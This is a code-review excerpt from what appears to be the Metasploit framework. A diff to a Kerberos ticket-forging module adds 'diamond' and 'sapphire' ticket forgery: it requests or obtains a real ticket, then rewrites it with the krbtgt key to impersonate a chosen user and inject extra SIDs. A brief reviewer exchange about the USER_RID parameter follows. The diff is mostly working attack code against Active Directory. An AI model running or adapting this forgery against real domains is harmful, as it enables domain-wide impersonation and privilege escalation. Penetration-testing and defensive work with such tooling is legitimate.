modules/auxiliary/admin/kerberos/forge_ticket.rb

```diff
@@ -125,12 +142,99 @@ def forge_golden
     forge_ccache(sname: sname, flags: flags, is_golden: true)
   end
 
+  def forge_diamond
+    validate_key!
+
+    begin
+      domain = datastore['DOMAIN']
+      options = {
+        server_name: "krbtgt/#{domain}",
+        client_name: datastore['REQUEST_USER'],
+        password: datastore['REQUEST_PASSWORD'],
+        realm: domain,
+        stop_if_preauth_not_required: false
+      }
+      enc_key, enc_type = get_enc_key_and_type
+      include_crypto_params(options, enc_key, enc_type)
+
+      tgt_result = send_request_tgt(**options)
+    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+      print_error("Requesting TGT failed: #{e.message}")
+      return
+    end
+
+    if tgt_result.krb_enc_key[:enctype] != enc_type
+      print_error("Response has incorrect encryption type (#{tgt_result.krb_enc_key[:enctype]})")
+      return
+    end
+
+    ticket = modify_ticket(tgt_result.as_rep.ticket, tgt_result.decrypted_part, datastore['USER'], datastore['USER_RID'], datastore['DOMAIN'], extra_sids, enc_key, enc_type, enc_key, false)
+    ticket = Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: datastore['RHOST'])
+
+    if datastore['VERBOSE']
+      print_ccache_contents(ticket, key: enc_key)
+    end
+  end
+
+  def forge_sapphire
+    options = {
+      stop_if_preauth_not_required: false
+    }
+    enc_key, enc_type = get_enc_key_and_type
+    include_crypto_params(options, enc_key, enc_type)
+
+    auth_context = kerberos_authenticator.authenticate_via_kdc(options)
+    credential = auth_context[:credential]
+
+    print_status("#{peer} - Using U2U to impersonate #{datastore['USER']}@#{datastore['DOMAIN']}")
+
+    session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+      type: credential.keyblock.enctype.value,
+      value: credential.keyblock.data.value
+    )
+
+    tgs_ticket, tgs_auth = kerberos_authenticator.u2uself(credential, impersonate: datastore['USER'])
+    ticket = modify_ticket(tgs_ticket, tgs_auth, datastore['USER'], datastore['USER_RID'], datastore['DOMAIN'], extra_sids, session_key.value, enc_type, enc_key, true)
```

Comment:
The conditions above suggest that `USER_RID` isn't used for the sapphire ticket.

Reply:
Thanks - I've passed in `nil` for sapphire, since it should retrieve this from the PAC.